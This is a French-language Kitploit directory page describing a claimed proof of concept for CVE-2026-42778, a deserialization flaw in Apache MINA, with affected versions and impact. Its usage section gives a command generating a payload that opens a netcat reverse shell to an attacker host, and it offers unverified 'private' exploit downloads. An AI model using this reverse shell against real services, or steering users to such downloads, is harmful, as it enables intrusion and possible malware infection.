Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-42778-POC — CVE-2026-42778 EUVD-2026-26492 Désérialisation de données non fiables (CWE-502) | Kitploit
Outils/GitHubGitHub/akinfue/cve-2026-42778-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebDéveloppement de Charges UtilesExploitation de Binaires
GitHubakinfue/cve-2026-42778-poc

CVE-2026-42778-POC

CVE-2026-42778 EUVD-2026-26492 Désérialisation de données non fiables (CWE-502)

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-42778

Vue d'ensemble

Correctif incomplet dans la méthode AbstractIoBuffer.getObject() d'Apache MINA. La validation de la liste blanche des noms de classes, qui restreint les classes pouvant être désérialisées, est appliquée trop tard, après que les initialiseurs statiques des classes en cours de lecture aient pu s'exécuter. Cela se produit car le correctif d'origine pour CVE-2024-52046 n'a pas été correctement appliqué aux branches 2.1.X et 2.2.X. Versions concernées : - Apache MINA 2.1.0 à 2.1.11 - Apache MINA 2.2.0 à 2.2.6

Exploit :

Télécharger ici

Détails

  • ID CVE : CVE-2026-42778

  • Publié : 05/01/2026

  • Impact : Critique

  • Disponibilité de l'exploit : Non public, uniquement privé.

  • CVSS : 9.8

  • Correctif disponible : (Aucun correctif officiel pour l'instant)

Impact

Un attaquant peut créer des objets sérialisés malveillants qui, lorsqu'ils sont traités par IoBuffer.getObject(), exécutent du code arbitraire via des initialiseurs statiques avant que la validation de la liste blanche des noms de classes ne soit effectuée. Étant donné qu'il s'agit d'une vulnérabilité accessible via le réseau ne nécessitant aucun privilège ni interaction de l'utilisateur, l'exécution de code à distance est possible pour toute application utilisant Apache MINA qui appelle la méthode IoBuffer.getObject(). La vulnérabilité permet une compromission totale de la confidentialité, de l'intégrité et de la disponibilité des systèmes concernés.

Versions concernées

  • Apache MINA 2.1.0 à 2.1.11
  • Apache MINA 2.2.0 à 2.2.6

Utilisation

root@kitploit:~
# Compiler et générer
javac ExploitGenerator.java
java ExploitGenerator "nc -e /bin/sh attacker-ip 4444"

# Envoyer sur le réseau au service basé sur MINA utilisant ObjectSerializationCodecFactory
# ou à tout point de terminaison qui appelle IoBuffer.getObject()

Contact

  • Pour toute demande, veuillez contacter : [email protected]
  • Exploit : ici
Télécharger l’outil